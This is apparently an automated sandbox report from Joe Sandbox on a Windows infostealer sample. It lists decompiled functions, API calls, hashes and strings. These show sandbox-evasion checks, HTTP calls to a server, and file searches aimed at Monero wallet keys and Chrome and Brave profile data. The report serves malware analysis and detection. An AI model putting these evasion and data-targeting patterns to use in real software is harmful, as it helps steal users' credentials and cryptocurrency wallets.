                          control_flow_graph 1436 b06af3 1437 b06b0a 1436->1437 1439 b06aba-b06ad7 call b0aad0 OpenEventA 1437->1439 1440 b06b0c-b06b22 call b06920 call b05b10 CloseHandle ExitProcess 1437->1440 1445 b06af5-b06b04 CloseHandle Sleep 1439->1445 1446 b06ad9-b06af1 call b0aad0 CreateEventA 1439->1446 1445->1437 1446->1440
                          APIs
                          • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,018A8AC8,?,00B1110C,?,00000000,?,00B11110,?,00000000,00B10AEF), ref: 00B06ACA
                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00B06AE8
                          • CloseHandle.KERNEL32(00000000), ref: 00B06AF9
                          • Sleep.KERNEL32(00001770), ref: 00B06B04
                          • CloseHandle.KERNEL32(?,00000000,?,018A8AC8,?,00B1110C,?,00000000,?,00B11110,?,00000000,00B10AEF), ref: 00B06B1A
                          • ExitProcess.KERNEL32 ref: 00B06B22
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                          • String ID:
                          • API String ID: 941982115-0
                          • Opcode ID: 251a43256525a76a83ade0a7ed5579de1053004da09aff8566e04bfd51e02650
                          • Instruction ID: 8ae935bc0fb1b0f032f9f7ee1db267f602040aa79c1a3a04d83ce959377a5cee
                          • Opcode Fuzzy Hash: 251a43256525a76a83ade0a7ed5579de1053004da09aff8566e04bfd51e02650
                          • Instruction Fuzzy Hash: DEF058B0B4030AABE710BBA0DC8ABBE7FB4EB04701F104994B503E12D1CBB09540DAA6
                          Function 00AF47B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                          • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00AF4839
                          • InternetCrackUrlA.WININET(00000000,00000000), ref: 00AF4849
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: CrackInternetlstrlen
                          • String ID: <
                          • API String ID: 1274457161-4251816714
                          • Opcode ID: 9703834ec422a689c793657f3045d5ec8008a8d2d5233309c6704bf0f719d273
                          • Instruction ID: 96ec91a0fe9b33175ecd0b9520514114996e6698233f4d6e7a701c554c8bd4a0
                          • Opcode Fuzzy Hash: 9703834ec422a689c793657f3045d5ec8008a8d2d5233309c6704bf0f719d273
                          • Instruction Fuzzy Hash: 75210EB1D00309ABDF14DFA4E845ADE7B75FB45320F108625F955A72D0EB706A09CB91
                          Function 00B051F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                            • Part of subcall function 00B0A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00B0A7E6
                            • Part of subcall function 00AF6280: InternetOpenA.WININET(00B10DFE,00000001,00000000,00000000,00000000), ref: 00AF62E1
                            • Part of subcall function 00AF6280: StrCmpCA.SHLWAPI(?,018AFBE0), ref: 00AF6303
                            • Part of subcall function 00AF6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00AF6335
                            • Part of subcall function 00AF6280: HttpOpenRequestA.WININET(00000000,GET,?,018AF500,00000000,00000000,00400100,00000000), ref: 00AF6385
                            • Part of subcall function 00AF6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00AF63BF
                            • Part of subcall function 00AF6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00AF63D1
                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00B05228
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                          • String ID: ERROR$ERROR
                          • API String ID: 3287882509-2579291623
                          • Opcode ID: 8f288015c64e725de747b272d93d2bca49dd4ea640bbbc4595c9c64770d802fe
                          • Instruction ID: 03438a91d254b40a582b233435ce09a3e6850e3a4a7682c1a71cd393d2af30b6
                          • Opcode Fuzzy Hash: 8f288015c64e725de747b272d93d2bca49dd4ea640bbbc4595c9c64770d802fe
                          • Instruction Fuzzy Hash: F8110330910248ABDB14FF74DD56EED7BB8AF50300F908998F91A575D2EF31AB05CA91
                          Function 00AF1220 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1493 af1220-af1247 call b089b0 GlobalMemoryStatusEx 1496 af1249-af1271 call b0da00 * 2 1493->1496 1497 af1273-af127a 1493->1497 1498 af1281-af1285 1496->1498 1497->1498 1501 af129a-af129d 1498->1501 1502 af1287 1498->1502 1504 af1289-af1290 1502->1504 1505 af1292-af1294 ExitProcess 1502->1505 1504->1501 1504->1505
                          APIs
                          • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00AF123E
                          • ExitProcess.KERNEL32 ref: 00AF1294
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExitGlobalMemoryProcessStatus
                          • String ID: @
                          • API String ID: 803317263-2766056989
                          • Opcode ID: 722961d400d5233504500dc7034c4ce35fd8cc10673be638151da5dcc8fec180
                          • Instruction ID: 203872af2ede5cab03bdc93c3ba59be0c2bedc47ef5470dbbbea4689b019a2c1
                          • Opcode Fuzzy Hash: 722961d400d5233504500dc7034c4ce35fd8cc10673be638151da5dcc8fec180
                          • Instruction Fuzzy Hash: CF011DB0E4430CFAEB10EBE4CC49BEEBBB8AB14705F608459F705B62C0D77496458B99
                          Function 00AF1110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00AF112B
                          • VirtualAllocExNuma.KERNEL32(00000000), ref: 00AF1132
                          • ExitProcess.KERNEL32 ref: 00AF1143
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process$AllocCurrentExitNumaVirtual
                          • String ID:
                          • API String ID: 1103761159-0
                          • Opcode ID: d61f089f688fb0583675f90f6c0ac44a30df6fcdae6439abbe22d6c96171b31a
                          • Instruction ID: 86b4597d8301a2fe8b15edf1cfeff6f538df724633fe839ff7ff7d2a86b9449e
                          • Opcode Fuzzy Hash: d61f089f688fb0583675f90f6c0ac44a30df6fcdae6439abbe22d6c96171b31a
                          • Instruction Fuzzy Hash: D5E0E670B4534CFBE7506BE4DD0EB197678AB04B01F104154F709B62D0D6B5264096A9
                          Function 00AF10A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                          Download Yara Rule
                          APIs
                          • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00AF10B3
                          • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 00AF10F7
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Virtual$AllocFree
                          • String ID:
                          • API String ID: 2087232378-0
                          • Opcode ID: b247cc385a86bab197734e1601092e7bb8b734290cfd99778c34111a7a8d7630
                          • Instruction ID: bc7fb3ef8fa0b0994f9ce0c60d95eaa45da8a9a190bc67879f42aa934b425b16
                          • Opcode Fuzzy Hash: b247cc385a86bab197734e1601092e7bb8b734290cfd99778c34111a7a8d7630
                          • Instruction Fuzzy Hash: B2F0E2B1641308BBE7149BA8AC49FBAB7E8E705B15F301848F684E3280D9719F00CAA0
                          Function 00AF1190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00B078E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00B07910
                            • Part of subcall function 00B078E0: RtlAllocateHeap.NTDLL(00000000), ref: 00B07917
                            • Part of subcall function 00B078E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00B0792F
                            • Part of subcall function 00B07850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00AF11B7), ref: 00B07880
                            • Part of subcall function 00B07850: RtlAllocateHeap.NTDLL(00000000), ref: 00B07887
                            • Part of subcall function 00B07850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00B0789F
                          • ExitProcess.KERNEL32 ref: 00AF11C6
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$Process$AllocateName$ComputerExitUser
                          • String ID:
                          • API String ID: 3550813701-0
                          • Opcode ID: 8c69ddfc0c2343d2a58f3be06c24c01b0f9eaf4d55045786d82670e54d1484a8
                          • Instruction ID: e4047bb1a297f6f61617ed7a22d0b2340c0ea4359f099d003f05e40b2fec63d4
                          • Opcode Fuzzy Hash: 8c69ddfc0c2343d2a58f3be06c24c01b0f9eaf4d55045786d82670e54d1484a8
                          • Instruction Fuzzy Hash: BBE012B6F5430553CA0073F5AC0BB2A3BDC6B14345F040568FA85D2682FE25F901857A

                          Non-executed Functions

                          Function 00B038B0 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON
                          Download Yara Rule
                          APIs
                          • wsprintfA.USER32 ref: 00B038CC
                          • FindFirstFileA.KERNEL32(?,?), ref: 00B038E3
                          • lstrcat.KERNEL32(?,?), ref: 00B03935
                          • StrCmpCA.SHLWAPI(?,00B10F70), ref: 00B03947
                          • StrCmpCA.SHLWAPI(?,00B10F74), ref: 00B0395D
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00B03C67
                          • FindClose.KERNEL32(000000FF), ref: 00B03C7C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                          • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                          • API String ID: 1125553467-2524465048
                          • Opcode ID: 1bfc73cb6f7f54ebe84b94a54d0deea14f5a5233bd9381e136cf5e093c2803cf
                          • Instruction ID: 24e247416a98420456b30b7c6955462454c08e24b8f8ba38a2ea8be874e231f1
                          • Opcode Fuzzy Hash: 1bfc73cb6f7f54ebe84b94a54d0deea14f5a5233bd9381e136cf5e093c2803cf
                          • Instruction Fuzzy Hash: BDA131B1A003089BDB24DBA4DC89FEE77BCFB44700F4445C8A64D96191EB759B84CF62
                          Function 00AFBE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675fileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00B0A740: lstrcpy.KERNEL32(00B10E17,00000000), ref: 00B0A788
                            • Part of subcall function 00B0A920: lstrcpy.KERNEL32(00000000,?), ref: 00B0A972
                            • Part of subcall function 00B0A920: lstrcat.KERNEL32(00000000), ref: 00B0A982
                            • Part of subcall function 00B0A9B0: lstrlen.KERNEL32(?,018A89C8,?,\Monero\wallet.keys,00B10E17), ref: 00B0A9C5
                            • Part of subcall function 00B0A9B0: lstrcpy.KERNEL32(00000000), ref: 00B0AA04
                            • Part of subcall function 00B0A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B0AA12
                            • Part of subcall function 00B0A8A0: lstrcpy.KERNEL32(?,00B10E17), ref: 00B0A905
                          • FindFirstFileA.KERNEL32(00000000,?,00B10B32,00B10B2B,00000000,?,?,?,00B113F4,00B10B2A), ref: 00AFBEF5
                          • StrCmpCA.SHLWAPI(?,00B113F8), ref: 00AFBF4D
                          • StrCmpCA.SHLWAPI(?,00B113FC), ref: 00AFBF63
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00AFC7BF
                          • FindClose.KERNEL32(000000FF), ref: 00AFC7D1
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                          • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                          • API String ID: 3334442632-726946144
                          • Opcode ID: 034be22757414b777f589dd62b83d725340431348361fd4910fa01ac0db8846a
                          • Instruction ID: 88441639602963e6ce62cb29b8d7d5414fcea4f3633af2ef49747c988175cd70
                          • Opcode Fuzzy Hash: 034be22757414b777f589dd62b83d725340431348361fd4910fa01ac0db8846a
                          • Instruction Fuzzy Hash: CD424571A1030897DB14FBA4DD96EED77BCAB94300F4089D8B506A61D1EF349F49CBA2
                          Function 00B04910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172fileCOMMON
                          Download Yara Rule
                          APIs
                          • wsprintfA.USER32 ref: 00B0492C
                          • FindFirstFileA.KERNEL32(?,?), ref: 00B04943
                          • StrCmpCA.SHLWAPI(?,00B10FDC), ref: 00B04971
                          • StrCmpCA.SHLWAPI(?,00B10FE0), ref: 00B04987
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00B04B7D
                          • FindClose.KERNEL32(000000FF), ref: 00B04B92
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmpDownload File
